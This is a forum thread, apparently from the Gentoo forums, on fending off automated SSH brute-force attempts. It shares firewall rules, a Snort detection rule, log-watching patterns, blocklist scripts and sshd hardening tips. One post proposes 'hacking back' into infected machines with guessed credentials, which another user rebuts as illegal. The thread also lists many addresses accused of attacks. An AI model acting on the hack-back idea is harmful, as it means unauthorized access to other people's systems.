All these attempts seem to be produced by Linux boxes compromised by a foolish script that only looks for servers with port 22 open.

Some dumbass sysadmins must be impaled; how does someone with Linux knowledge let their boxes be infected by that stupid worm/script?

I guess they are MCSEs forced to deploy Linux, then they make it as insecure as possible to blame Linux as an unsafe system.

----------

## ARC2300

Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.

http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.

I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.

And I looked at one of the addresses in that attempt log in a web browser. . . it's an HTTP Debian server with a default install.    :Confused: 

----------

## jkroon

Aha, weird thread.

Anyway, when these were at their peak I picked up 7 or 8 attempts per day over a period of about 3 months, still getting a few every now and again.  Mostly from Taiwan and surrounding area...

port knocking was mentioned a few times, so http://www.kroon.co.za/portknock.php - let me know what you think.  I put this together a while back on request from a system administrator.  AFAIK there are no problems with it and I used it for a while until I decided that ssh really is secure enough.

And about the iptables firewall, the following small set of rules should do:

```
#! /bin/bash
EXT=eth0
INT=eth1

iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -P FORWARD DROP
iptables -A INPUT -m state --state related,established -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
# multiport takes a comma-separated list after --dports; "-dports" is not an option
iptables -A INPUT -i $INT -p tcp -m multiport --dports 22,25,80,139,445 --syn -j ACCEPT
iptables -A INPUT -i $EXT -p tcp --destination-port 22 --syn -j ACCEPT
iptables -A INPUT -i $INT -p udp -m multiport --dports 53,137,138 -j ACCEPT
iptables -A FORWARD -m state --state related,established -j ACCEPT
iptables -A FORWARD -i $INT -o $EXT -p tcp -m multiport --dports 22,80,110,143,443,6667 --syn -j ACCEPT
iptables -t nat -A POSTROUTING -o $EXT -j MASQUERADE
```

You can of course restrict OUTPUT too  :Smile: .  Also, remember to adjust those port numbers to your needs.  Be warned, nmblookup '*' breaks with this ruleset.

----------

## rex123

 *revertex wrote:*   

> Some dumbass sysadmins must be impaled; how does someone with Linux knowledge let their boxes be infected by that stupid worm/script?
> 
> I guess they are MCSEs forced to deploy Linux, then they make it as insecure as possible to blame Linux as an unsafe system.

 

It's obviously a fallacy to assume any of these:

- Linux users are excellent sysadmins (just look at these forums :) )

- Windows users hate Linux (again, see how many people here use both)

- The fact that a Linux vulnerability can be exploited is somehow down to Microsoft-lovers with a grudge (this is amazingly irrational)

----------

## jkroon

Well put.

No, I'm afraid as the masses convert (if they ever do) we will see many, many, many more of these types of problems.

I've also had a few "Administrator" attempts, probably aimed at OpenSSH running on Windows ...

Also, I've actually heard of quite a number of successful breakins based on these test type users...

----------

## vdboor

 *rex123 wrote:*   

> It's obviously a fallacy to assume any of these:
> 
> - Linux users are excellent sysadmins (just look at these forums  )
> 
> - Windows users hate Linux (again, see how many people here use both)
> ...

 

No, I believe there are a lot of dumb Linux users out there.. perhaps not at these forums, but I wouldn't be surprised to notice how many kids/students playing with Linux run a nice desktop without knowing what ssh exactly is. ...or run ssh without changing the sshd_config file.

I think the following comment proves this theory:

 *jkroon wrote:*   

> Also, I've actually heard of quite a number of successful breakins based on these test type users...

 

----------

## ai

 *ARC2300 wrote:*   

> Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.
> 
> http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.
> 
> I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.
> ...

 

A script that adds the IP of a supposed abuser (let's say after 3 failed attempts) to hosts.deny would be great ;] something like portsentry which additionally monitors sshd logs.

----------

## flickerfly

Is anyone using tenshi to do reports on the logs for you? I'm curious what your config would look like. I've been meaning to get into that prog and this seems like a good test subject.

I don't care that they fail to log in, so I shan't try to block them, but I can learn from their efforts.   :Very Happy: 

----------

## ARC2300

 *ai wrote:*   

>  *ARC2300 wrote:*   Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.
> 
> http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.
> 
> I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.
> ...

 

Yes, that would be great, but I have a few legit users that have failed to log in within 3 tries either due to forgetting their password or because they don't know about the 10 second limit I've imposed for logging into the machine.

I just decided to bump the port way, way up.  Hopefully that'll fix problems.

----------

## jkroon

You really do need a lot of these attempts per second before it should start becoming a serious issue, as in to the degree of slowing down your host.  There should be no way for it to crash your machine.  It might take it "offline" due to all your bandwidth being absorbed, but there are more effective, stealthier ways to achieve that, such as smurf attacks, or even simple SYN flooding from a spoofed address.

A quick question to ARC2300, you say your box crashed when this started?  What exactly crashes, OpenSSH, the kernel, or some other subsystem?

----------

## gigel

After seeing the texts and where they hosted the files I suspect (I mean, I'm sure) these are just another bunch of Romanian lamers...

 *bcore wrote:*   

> but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...

 

This is a good thing to do in this case of attacks, but if one is trying to exploit a pre-authentication bug then you're compromised...

I suggest you filter with iptables (or any other method) to allow SSH logins only from trusted IPs

----------

## vdboor

 *ARC2300 wrote:*   

> Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.

 

This gives me the impression one of your services or kernel already crashed on an exploit attempt. I can hardly believe sshd would crash your machine because it rejects normal login attempts; something else is happening here.

Note that the difference between an application crash and a successful exploit is very subtle. If an application crashes on incorrect input, it is likely there is also a way to send data that doesn't crash the app, but nevertheless corrupts memory (and exploits your app in the process).

----------

## bware

In general simply run some rootkit checkers to determine whether you've been rooted  :Smile: 

On a side note... most virus scanners (including the Windows variants) are able to detect most rootkits/exploited files.

If you suspect your machine, disconnect it from the net - to keep others from being abused - and check to see if it is so by running rootkit checkers, virus scanners, etc. after booting from unwritable media (livecd).

Programs to check are useradd, ps, ls, grep - most rootkit checkers will do this for you - and examine timestamps (a simple ls -la will suffice).  If you're a victim, I'd suggest a clean install, but then again it's up to you

----------

## ARC2300

Actually, I know it hasn't been rooted, as no strange directories have shown up, as well as nothing strange in the logs, and netstat -a shows up nothing out of the ordinary.

And it just crashed after I've switched the port to one much higher, so I'm thinking it's something else.  That motherboard has been giving me issues for some time, such as not wanting to take on the other 80GB HDD I just put in (that works fine everywhere else), and losing BIOS information occasionally.

----------

## vdboor

 *ARC2300 wrote:*   

> Actually, I know it hasn't been rooted, as not strange directories have shown up, as well as nothing strange in the logs, and netstat -a shows up nothing out of the ordinary.

 

Note that your kernel could be trojaned (with a new module loaded) that hides these files from "ls" and "netstat". These binaries can be trojaned too of course to hide the rootkit..

 *Quote:*   

> And it just crashed after I've switched the port to one much higher, so I'm thinking it's something else.  That motherboard has been giving me issues for some time

 

Sounds more logical in this case indeed...

mod edit: removed doublepost.

amne

----------

## hanj

 *Quote:*   

> braverock wrote:
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command.
> 
> - Brian

 

You may want to look into snortsam plugin for snort. You can append snortsam plugin to specific rule which will add a chain to iptables. You can have it block for x number of minutes, etc. You can also protect yourself from self DoS, by adding your networks and/or DNS servers, etc from the 'exclude' list.

Snortsam is in portage:

net-analyzer/snortsam-2.24

If you use the bleeding -rules and add SSH Scan rule to your existing snort rule, you can spot these SSH attempts

http://www.bleedingsnort.com/

Here is the SSH Scan signature/rule:

```
alert tcp any any -> $HOME_NET 22 (msg:"BLEEDING-EDGE Potential SSH Scan"; flags:S; threshold:type threshold, track by_src, count 5, seconds 120; classtype:attempted-dos; sid:2001219; rev:6; )
```

HTH

hanji

----------

## hanj

 *Quote:*   

> flickerfly wrote:
> 
> Is anyone using tenshi to do reports on the logs for you? I'm curios what your config would look like. I've been meaning to get into that prog and this seems like a good test subject. 

 

You could set up tenshi or swatch to monitor your logs and report on failed connections or successful connections to ssh..here is my tenshi config piece dealing with sshd

```
group ^sshd(?:\(pam_unix\))?:
critical ^sshd: fatal: Timeout before authentication for (.+)
critical ^sshd: Illegal user
report   ^sshd: Connection from (.+)
report   ^sshd: Connection closed (.+)
report   ^sshd: Closing connection (.+)
report   ^sshd: Found matching (.+) key: (.+)
report   ^sshd: Accepted publickey (.+)
report   ^sshd: Accepted rsa for (.+) from (.+) port (.+)
report   ^sshd: Accepted keyboard-interactive/pam for (.+) from (.+) port (.+)
root     ^sshd\(pam_unix\): session opened for user root by root\(uid=0\)
root     ^sshd\(pam_unix\): session opened for user root by \(uid=0\)
report   ^sshd\(pam_unix\): session closed for user (.*)
root     ^sshd\(pam_unix\): session opened for user (.*)
critical ^sshd\(pam_unix\): authentication failure; logname=
critical ^sshd: Failed password for
report   ^passwd\(pam_unix\)\[(.*)\]:
root   ^sshd: Accepted password for
group_end
```

You can do something very similar with swatch, but tenshi is much more robust. All critical and root items are emailed to me immediately, reports are sent in every 8 hours.

HTH 

hanji

----------

## ARC2300

 *vdboor wrote:*   

>  *ARC2300 wrote:*   Actually, I know it hasn't been rooted, as not strange directories have shown up, as well as nothing strange in the logs, and netstat -a shows up nothing out of the ordinary. 
> 
> Note that your kernel could be trojaned (with a new module loaded) that hides these files from "ls", and "netstat". These binaries can be trojaned too off course to hide the rootkit..
> 
>  *Quote:*   And it just crashed after I've switched the port to one much higher, so I'm thinking it's something else.  That motherboard has been giving me issues for some time 
> ...

 

AFAIK, you can't change the date/time a file was written, though.  I don't use modules whatsoever for this reason, and my bzImage has the same date and time since last compile.

----------

## Chris W

Thou shalt not allow tunnelled, clear-text password authentication over SSH  :Wink:    Public key authentication or no access. 

```
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
PasswordAuthentication no
```

For you: carrying around a private key with a good passphrase is a small price to pay.

For the cracker: no amount of guessing is going to yield a useful key in a reasonable amount of time.
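
As an added example (not from Chris W or anyone else in this thread), the following audits an sshd_config text for the settings recommended across the thread: Protocol 2 only, PermitRootLogin no, PasswordAuthentication no, PermitEmptyPasswords no and an AllowUsers list. Both config texts are constructed; the compiled-in defaults it assumes for absent keywords (Protocol 2,1, PermitRootLogin yes, PasswordAuthentication yes, PermitEmptyPasswords no) are the OpenSSH 3.x-era ones, and it only parses the "Keyword value" form:

```shell
#!/bin/sh
# Added example, not from the thread: audit an sshd_config text for the weak
# settings discussed here. Both configs below are constructed.

# A config with the defaults this thread warns about: SSH-1 allowed, root may
# log in, password authentication commented out and therefore on, empty
# passwords accepted, no AllowUsers.
WEAK_CONFIG='Protocol 2,1
PermitRootLogin yes
#PasswordAuthentication yes
PermitEmptyPasswords yes'

# The hardened form: key-only logins, no root, one named account.
HARDENED_CONFIG='Protocol 2
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
AllowUsers alice@*'

# setting CONFIG KEYWORD DEFAULT: the effective value, lowercased. Like sshd,
# the first uncommented "Keyword value" line wins; DEFAULT is printed when the
# keyword is absent (the defaults passed by audit are assumed OpenSSH 3.x ones).
setting() {
    val=$(printf '%s\n' "$1" \
          | grep -Ei "^[[:space:]]*$2[[:space:]]+" \
          | head -n 1 | awk '{ print $2 }' | tr 'A-Z' 'a-z')
    printf '%s\n' "${val:-$3}"
}

# One line per weak setting; no output means the config passes.
audit() {
    cfg=$1
    case "$(setting "$cfg" Protocol '2,1')" in
        *1*) echo "Protocol: SSH-1 still enabled, set 'Protocol 2'" ;;
    esac
    [ "$(setting "$cfg" PermitRootLogin yes)" = no ] \
        || echo "PermitRootLogin: set 'PermitRootLogin no'"
    [ "$(setting "$cfg" PasswordAuthentication yes)" = no ] \
        || echo "PasswordAuthentication: set 'PasswordAuthentication no' and use keys"
    [ "$(setting "$cfg" PermitEmptyPasswords no)" = no ] \
        || echo "PermitEmptyPasswords: set 'PermitEmptyPasswords no'"
    [ -n "$(setting "$cfg" AllowUsers '')" ] \
        || echo "AllowUsers: not set, list the accounts that may log in"
}

# Number of findings for a config, always a plain integer.
weak_count() {
    audit "$1" | awk 'END { print NR }'
}

echo "weak config:";     audit "$WEAK_CONFIG"
echo "hardened config:"; audit "$HARDENED_CONFIG"
```

Run against a real file with `audit "$(cat /etc/ssh/sshd_config)"`; the commented-out `#PasswordAuthentication yes` line in the weak config is the trap Chris W's snippet avoids, since a commented keyword leaves the compiled-in default (password logins on) in force.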

----------

## hanj

 *Quote:*   

> 
> 
> ARC2300 said:
> 
> I must say, though, that this is REALLY pissing me off. I've emailed countless abuse@ISP addresses now, and finally gave up. I should write a script, though, that does it for me. 

 

You should try incident.pl. It uses output from ACID and does a whois to retrieve abuse contacts of the offending IP. The format it needs is an mbox file, so if you're running with .maildir like me, you'll need another script that cats all the mails together prior to incident.pl

http://freshmeat.net/projects/incident.pl/

HTH 

hanji

----------

## ttuttle

I got an idea.

Since you know the breakins come from another computer with this worm, how about you create an account with a shell that tries to log in to the other computer with those username/password pairs, and when it finds one working, delete the worm, leave a README.TXT in the home directory (in case someone uses that account) and change the password to a random string.

----------

## Aaton

Well I have been blocking those systems from my system by running a simple script over my logs.

```
#!/bin/bash

# Collect the source addresses of every "Illegal user ... from <ip>" line.
# The auth logs live under /var/log.
cd /var/log || exit 1

# Start from the hand-maintained list, then add the sources seen in the
# current, the previous and the rotated/compressed auth logs.
cat /etc/bad-ips > bad-ssh
grep -h Illegal auth.log auth.log.0 | sed -e 's/^.*from //' | sort -u >> bad-ssh
zcat auth.log.[1-6].gz | grep Illegal | sed -e 's/^.*from //' | sort -u >> bad-ssh

# 2.6.x kernels log IPv4-mapped addresses as ::ffff:a.b.c.d (on my system at least);
# strip that prefix, then de-duplicate and write the merged list back.
sed -e 's/::ffff://g' bad-ssh | sort -u | sort -n > /etc/bad-ips
```

Then in my firewall script I just loop through the list and say goodbye to them.  I run both by hand instead of from cron currently. 

```
# create NOLOGDUMP table since I don't care to see things
# junking up my logs that I know I'm blocking
# (-N fails harmlessly when the chain already exists, so its stderr is discarded)
/sbin/iptables -N NOLOGDUMP 2> /dev/null
/sbin/iptables -F NOLOGDUMP
/sbin/iptables -A NOLOGDUMP -p tcp -j REJECT --reject-with tcp-reset
/sbin/iptables -A NOLOGDUMP -p udp -j REJECT --reject-with icmp-port-unreachable
/sbin/iptables -A NOLOGDUMP -j DROP

#----------------------------------------------
# The IP's that I don't want people connecting
# from for one reason or another. Bad mojo...
#----------------------------------------------
while read -r i
do
        /sbin/iptables -A INPUT -i eth0 -s "$i/32" -j NOLOGDUMP
        echo -n "."
done < /etc/bad-ips
```

Also if you're able to do it you should make some changes to your sshd_config to not allow root logins and only allow yourself. Plus I only allow access via SSHv2 keys which are passphrase protected.

```
AllowUsers your-username@*
PermitRootLogin no
PermitEmptyPasswords no
PasswordAuthentication no
```

The current list of IP's that my boxes won't be talking to for a while  :Smile: 

```
4.20.167.136
32.97.118.83
61.135.145.249
61.138.232.60
61.143.64.20
61.150.43.123
61.211.239.236
61.237.240.19
62.193.142.1
62.193.232.184
62.44.16.251
64.251.27.26
64.9.94.130
65.120.161.253
65.217.45.164
65.35.250.245
65.75.181.100
66.15.145.131
66.236.24.228
66.237.31.114
66.35.98.27
66.79.160.187
66.88.132.38
66.98.180.23
69.59.172.140
80.252.99.102
80.53.151.83
80.53.18.106
140.112.65.123
140.113.156.127
140.123.111.43
140.130.114.134
148.231.21.31
152.1.100.215
163.19.1.111
163.27.99.67
195.22.30.170
195.235.100.122
200.204.145.218
200.223.130.179
200.68.1.187
202.123.169.217
202.39.224.36
202.39.71.115
203.131.125.155
203.192.141.113
203.197.22.83
203.203.212.175
203.251.225.23
203.69.243.102
203.72.63.101
203.75.73.211
205.206.125.61
205.252.89.78
206.225.84.3
208.37.31.20
210.0.186.83
210.127.244.75
210.172.161.55
210.212.85.11
210.250.51.252
210.95.186.129
211.138.113.23
211.157.101.13
211.169.202.20
211.169.202.21
211.199.181.85
211.206.121.204
211.219.30.145
211.234.100.105
211.234.52.115
211.241.101.137
211.248.38.252
212.100.197.34
212.160.103.92
213.155.196.143
213.22.143.6
213.25.118.70
213.8.141.243
217.58.140.2
218.153.215.158
218.157.239.68
218.232.19.190
218.24.205.20
218.28.44.152
218.30.21.236
218.54.200.87
220.65.128.4
220.67.180.33
220.70.167.67
220.80.108.78
220.94.138.85
221.11.1.72
221.224.15.42
222.47.83.41
```
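The same log-to-blocklist idea as Aaton's two scripts, written as an added example (this is not Aaton's code and not part of the original post). It takes the "Illegal user" lines, strips the ::ffff: prefix the post mentions, refuses anything that is not a dotted quad so that a malformed log line can never turn into a firewall rule, and emits the NOLOGDUMP rules as one iptables-restore ruleset instead of forking iptables once per address. The log lines are constructed here with RFC 5737 documentation addresses; NOLOGDUMP and eth0 are the names from the post above.

```shell
#!/bin/sh
# Added example (not Aaton's script): build the blocklist from "Illegal user"
# lines and emit the firewall rules as iptables-restore text.

# Constructed sample auth.log lines (RFC 5737 documentation addresses, not
# real attackers). Two sources appear both bare and in the ::ffff: form.
SAMPLE_LOG='Dec 12 13:46:46 datbox sshd[23638]: Illegal user test from 192.0.2.10
Dec 12 13:46:47 datbox sshd[23639]: Illegal user admin from ::ffff:192.0.2.10
Dec 12 13:47:01 datbox sshd[23640]: Illegal user guest from 198.51.100.7
Dec 12 13:48:12 datbox sshd[23641]: Accepted publickey for hw from 203.0.113.5 port 50000 ssh2
Dec 12 13:49:00 datbox sshd[23642]: Illegal user oracle from ::ffff:198.51.100.7'

# extract_bad_ips: log text on stdin -> one unique IPv4 per line on stdout.
# Keeps only the source of "Illegal user" lines, strips the IPv4-mapped
# "::ffff:" prefix, discards anything that is not a dotted quad, and sorts
# numerically octet by octet (a plain "sort -n" only orders the first octet).
extract_bad_ips() {
    grep 'Illegal user' \
    | sed -e 's/^.*from //' -e 's/^::ffff://' -e 's/ .*$//' \
    | grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$' \
    | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n -u
}

# count_bad_ips: number of distinct offending hosts in the log text on stdin.
count_bad_ips() {
    extract_bad_ips | wc -l | tr -d ' '
}

# render_rules: IP list on stdin -> iptables-restore ruleset on stdout.
# The NOLOGDUMP chain rejects TCP with a reset, UDP with port-unreachable and
# drops the rest, exactly as in the post; nothing here invokes iptables.
render_rules() {
    echo '*filter'
    echo ':NOLOGDUMP - [0:0]'
    echo '-A NOLOGDUMP -p tcp -j REJECT --reject-with tcp-reset'
    echo '-A NOLOGDUMP -p udp -j REJECT --reject-with icmp-port-unreachable'
    echo '-A NOLOGDUMP -j DROP'
    while IFS= read -r ip; do
        [ -n "$ip" ] && echo "-A INPUT -i eth0 -s $ip/32 -j NOLOGDUMP"
    done
    echo 'COMMIT'
}

# Usage (prints the ruleset for the constructed sample):
#   printf '%s\n' "$SAMPLE_LOG" | extract_bad_ips | render_rules
```

To apply the output, pipe it into `iptables-restore`; without `--noflush` that replaces the whole filter table, and with `--noflush` the `-A` lines are appended to whatever is already loaded, so re-running it produces duplicate rules unless the chain is flushed first. The dotted-quad check matters more than it looks: `sed 's/^.*from //'` keeps whatever follows the last "from", and a log line with an unexpected tail would otherwise be handed to the firewall verbatim.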

----------

## hanj

In case anyone hasn't heard... since ACID has been 'dead' for awhile, there is BASE, which is in active development! 

http://base.secureideas.net/

 *Quote:*   

> BASE is the Basic Analysis and Security Engine. It is based on the code from the Analysis Console for Intrusion Databases (ACID) project. This application provides a web front-end to query and analyze the alerts coming from a SNORT IDS system.

 

hanji

----------

## dat

I just checked my logs today, and I noticed this in there:

```
datbox:~# grep -i sshd /var/log/auth.log | tail -n 50
Dec 12 13:46:46 datbox sshd[23638]: Bad protocol version identification 'cisco' from 82.96.96.3
Dec 12 13:46:46 datbox sshd[23639]: Bad protocol version identification '82.96.96.3:802' from 82.96.96.3
Dec 12 14:19:10 datbox sshd[23699]: Bad protocol version identification 'cisco' from 82.96.96.3
Dec 12 15:47:06 datbox sshd[23851]: Bad protocol version identification 'cisco' from 82.96.96.3
Dec 12 15:47:06 datbox sshd[23852]: Bad protocol version identification '82.96.96.3:802' from 82.96.96.3
Dec 12 17:09:24 datbox sshd[23999]: Bad protocol version identification 'cisco' from 82.96.96.3
```

Now, as a little background info, I run my sshd on 23 instead of port 22.  I'm assuming that someone is trying to hack into my box thinking that it's telnet and not sshd (hence the bad protocol version).  What throws me off is the 'cisco'.   Do they think it's actually a cisco box or something?

----------

## jkt

 *ReneeTeunissen wrote:*   

> Well, first thing I do is to ADD a second account "root" (eg toor or something like that) and remove the shell from the real root, eg a small script as login shell which will email you, or /bin/false.

 

...and when some of your init scripts want the root password (for example when your root fs gets broken), you have troubles...

----------

## jkt

 *ThinkingInBinary wrote:*   

> I got an idea.
> 
> Since you know the breakins come from another computer with this worm, how about you create an account with a shell that tries to log in to the other computer with those username/password pairs, and when it finds one working, delete the worm, leave a README.TXT in the home directory (in case someone uses that account) and change the password to a random string.

 

very bad idea, this will be considered illegal. it's the same as breaking into someone else's house, changing his front door lock and leaving a message "your doors were insecure. I've replaced your lock, keys are not available (I've destroyed them)."

You'll run into trouble if you do something like that.

----------

## jkt

 *ARC2300 wrote:*   

> AFAIK, you can't change the date/time a file was written, though.  I don't use modules whatsoever for this reason, and my bzImage has the same date and time since last compile.

 

Of course you can. `man touch` for details.

----------

## setagllib

I don't know if it's been mentioned herein (too many pages and not enough time to check them all  :Smile: ), but you *really* should use pubkey-only authentication on your sshd. This is infinitely harder to crack than plain passwords, and makes this kind of dictionary attack virtually impossible, or at least impractical.

There's a sufficiently useful guide to this here: http://open.bsdcow.net/tutorials/ssh_pubkey_auth (for OpenBSD, but the procedure is the same for any OpenSSH).

I very strongly recommend disabling every other kind of authentication. When you get an error authenticating, the auth methods in parentheses should only be 'publickey'.

In fact, avoid password and PAM authentication everywhere you have a choice. Passwords are just silly and PAM has a lot of design inconsistencies that allow exploits. For reasons to hate PAM, see here: http://bsd.slashdot.org/comments.pl?sid=131835&threshold=-1&commentsort=0&tid=8&tid=7&mode=thread&pid=11028401#11029113

I would also advise running your sshd on a different port (I do 4222, that's already beyond scanners expecting 22) and restricting your iptables firewall to only allow very trusted networks or specific IPs. It's worth it, trust me.

And of course frequently doing an audit of accounts is helpful if you still insist on using password auth. For pubkey, just cat your .ssh/authorized_keys and see if there are any keys there you don't remember putting in (chances are someone slipped one in after compromising your system to make it easier next time).

----------

## dat

 *dat wrote:*   

> I just checked my logs today, and I noticed this in there:
> 
> ```
> 
> datbox:~# grep -i sshd /var/log/auth.log | tail -n 50
> ...

 

I just noticed more of these messages coming from the same ip address.  They appear every couple days or so.  And just a few of them.  Any ideas?

EDIT: Nevermind.  It appears that I'm just getting scanned by freenode's servers looking for an open proxy running on system.  Guess I should've done a reverse dns lookup first!    :Wink: 

----------

## Randy R

I too found that someone had been in the test account on my machine. I changed the password and logged in and tried to execute "ls" and I received an error. The .bash_history file showed that whoever had access had been able to execute commands including "ls". The only group that test belongs to is test.

One of the packages that was downloaded is: mihai at ftp://elephant.homeunix.com/pub

Does any one know what that is?

EDIT: This file is on my server. I did not show the url that the hacker used.

----------

## ixion

Randy R, you've been compromised. I'd recommend a format and never using an account named test. If you have to play with something, use some obscure account name..  :Wink: 

edit: removed compromise story.. I actually wasn't compromised, logwatch was just picking up entries from a year ago this time, haha!  :Wink: 

----------

## rex123

I don't want to seem soft on crackers or anything, but I'm not sure we should all be formatting disks just because someone has logged on via ssh.

The only bad thing to have happened is that someone has logged on who you don't know, and maybe their intentions are less than honourable.

There seems to be a global effort to put IRC bots onto as many machines as possible, and ssh with bad passwords is the point of attack. But by default nobody will get root access, and there's no reason to assume that just because someone logs on they have got root. Actually, there should be good reason to assume the opposite, or there's no point having non-privileged accounts.

If someone logged on to your windows box and did "format c:", we would say "Windows security is rubbish". If you format your drive just because someone you don't know logs on, what's the difference?

----------

## jkt

If someone logged in to your box as a non-privileged user and you have a fairly recent system (so there are no known security bugs) and nothing says (s)he has got root access, there is no need to reinstall. However, if your box's software is older and wasn't upgraded for some time and contains known security bugs leading to local privilege escalation, you do have trouble and the only wise solution is to either restore from a safe backup or reinstall.

You can't trust your machine if someone else got root access.

----------

## dat

If someone was able to crack into your system, I think the best thing to do is assume the worst.  Surely it's not that difficult to back up your data and reinstall - albeit somewhat time consuming.

Anyway, that's my security policy.

----------

## hw-tph

Fun with stats! These are all from my laptop, which is not online 24/7, probably just about 6-10 hours a day.

Failed attempts during the last week:

```
hw@royne:~$ grep "Illegal user" /var/log/messages | wc -l
304
```

Unique number of hosts these attempts are coming from:

```
hw@royne:~$ grep "Illegal user" /var/log/messages | gawk '{ print $10 }' | sort -u | wc -l
18
```

Unique IP addresses:

```
hw@royne:~$ grep "Illegal user" /var/log/messages | gawk '{ print $10 }' | sort -u
192.192.73.119
202.93.171.2
211.218.149.213
211.250.15.2
212.72.201.193
213.171.37.3
216.118.117.117
217.222.89.228
220.130.245.9
24.107.37.231
61.220.130.92
62.44.16.251
63.241.142.67
64.246.40.136
66.15.145.131
67.110.180.136
81.30.206.242
84.118.242.4
```

I don't have the stats from my wannabe-server box (my desktop, which is online 24/7 with a public IP address), but I did notice that the desktop had way more attempts per online hour than my laptop. This I assume has something to do with my desktop being on a network where everyone has 10/10mbit connections or better and my laptop mostly being online on a network where 512/256kbit is the standard. This could suggest that the script kiddies are targeting networks where you are more likely to have a high performance network connection. 

Håkan

----------

## DeathAndTaxes

Uh, yeah.  Golly, good idea about the port-knocking, except the last I heard about the port-knocking was that a guy released the binaries with hard-coded knock sequences.  If there's been another development since then, I've not heard about it.

I've seen these attempts on many different boxes...Not surprisingly, many of the connections come from the 210. and 211. (AKA, a good chunk of China) class A blocks.  Those entire class A's get dropped on every box I admin because they're such a good source of spam already...Not surprised even more nefarious activities are coming from over there.

----------

## setagllib

I'm on Optus in Australia and I have a 211., and some friends on another node have 210. Not sure about China's range but we're here too.

Port knocking is a great idea if done right, but I'm happy just having a selective packet filter, a mysterious port, and public key logins. I've never once been compromised (even back in my Windows days) so I always have luck on my side.

Linux is shamefully the second-most compromised system, second only to Windows (this is a statistic I heard a while ago, maybe it's changing). This is more because of silly admins than software quality, but it's not untrue to say there have been a lot of careless security issues even in the kernel. With all the funding and separate projects to secure Linux, don't you think it'd be the most secure system out there? Not really. All of the BSDs do it as a base ideal, not something to be left for external investigation.

I repeat: if you *really* value security, run a BSD. Linux is still a convenience (and scalability) system. I'm not trying to spread FUD, I really like Linux, but this is one area that still troubles me to date.

----------

## ixion

I have to say the default install of BSD is pretty darn solid.. but the features are not nearly as easy to implement as Gentoo.. so it all weighs between convenience, features, and security.. you can't have it all..  :Wink: 

----------

## jkt

 *setagllib wrote:*   

> Linux is shamefully the second-most compromised system, second only to Windows (this is a statistic I heard a while ago, maybe it's changing). This is more because of silly admins than software quality, but it's not untrue to say there have been a lot of careless security issues even in the kernel.

 

IMHO the second place is because of its market share - compare the total amount of systems connected to the internet running linux and some bsd... (not commenting on security aspects of the kernel etc, I haven't the knowledge to do it). And of course silliness (is it the correct expression in english?) of admins is quite an important reason, too  :Wink: .

----------

## overcast

 *bcore wrote:*   

> I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

 

don't worry, we'll just download it off your box   :Laughing: 

----------

## chovy

I too had a ton of ssh attempts in my log file. Real names, like susie, robert, etc. all were failed attempts.

i keep my box open to ssh so i can login from anywhere

----------

## Phonics3k

I have had loads on my server too, coming from korea. The box is running fedora at the moment, but when I have 5 mins (Boxing day) then I will put gentoo on it and really put the walls up.

I was putting the IP's that were connecting to me in hosts.deny, is that a good thing to do? I also blocked root from logging in on ssh and only leave protocol 2 ssh logins.

----------

## rbr28

Wow, I didn't bother reading this whole thread, so I apologize in advance if this was already mentioned.  If you are using Gentoo, why not take advantage of the easy to use security features.  Tcp-wrappers is a good example.  tcpd is a default use flag and that enables tcp wrappers support in network services that support it (most of them).  All you need to do is create an /etc/hosts.allow and /etc/hosts.deny file.  Put ALL:ALL in /etc/hosts.deny.  Put ALL:127.0.0.1 in /etc/hosts.allow.  You've now increased security on your system dramatically.  If you need to open up services to other machines on your network, or outside your network, read up on tcp-wrappers, it's soooo easy to configure.  

The other obvious option is a firewall.  Gentoo makes it so easy to install a firewall, with many very easy to configure iptable front-ends.  I prefer Shorwall, but it's not as easy to configure as some of the others.  Some of the gui front-ends like Firehol are really easy to configure.

I mention these two options, despite the fact that they are obvious, because users still neglect to use them.  They are both so easy to use, and unlike some other security options, these two will help secure your machine, even if you make a lot of other mistakes.  For example, if your machine is firewalled, with no ports open, having an account you forgot about wouldn't be remotely exploitable (at least not easily).   Sysadmins know that firewalls are not the solution to all security problems, but for most users they plug a lot of holes.

If you get one or both of those configured, then you can go about looking at all the other options.  Check out the security guide in the Gentoo docs.  Take a look at the hardened-dev-sources and Grsecurity, which is a very easy way to add security.

Configure your logs properly.  Most users unfortunately don't do this, but just stick with whatever the default config is.  One thing I always do is extract all login information to its own log.  Make sure you rotate your logs so they are easier to scan.  Automated monitoring is also very useful.  Again, these are just some obvious tips.  There's really no excuse for a Linux box being hacked.
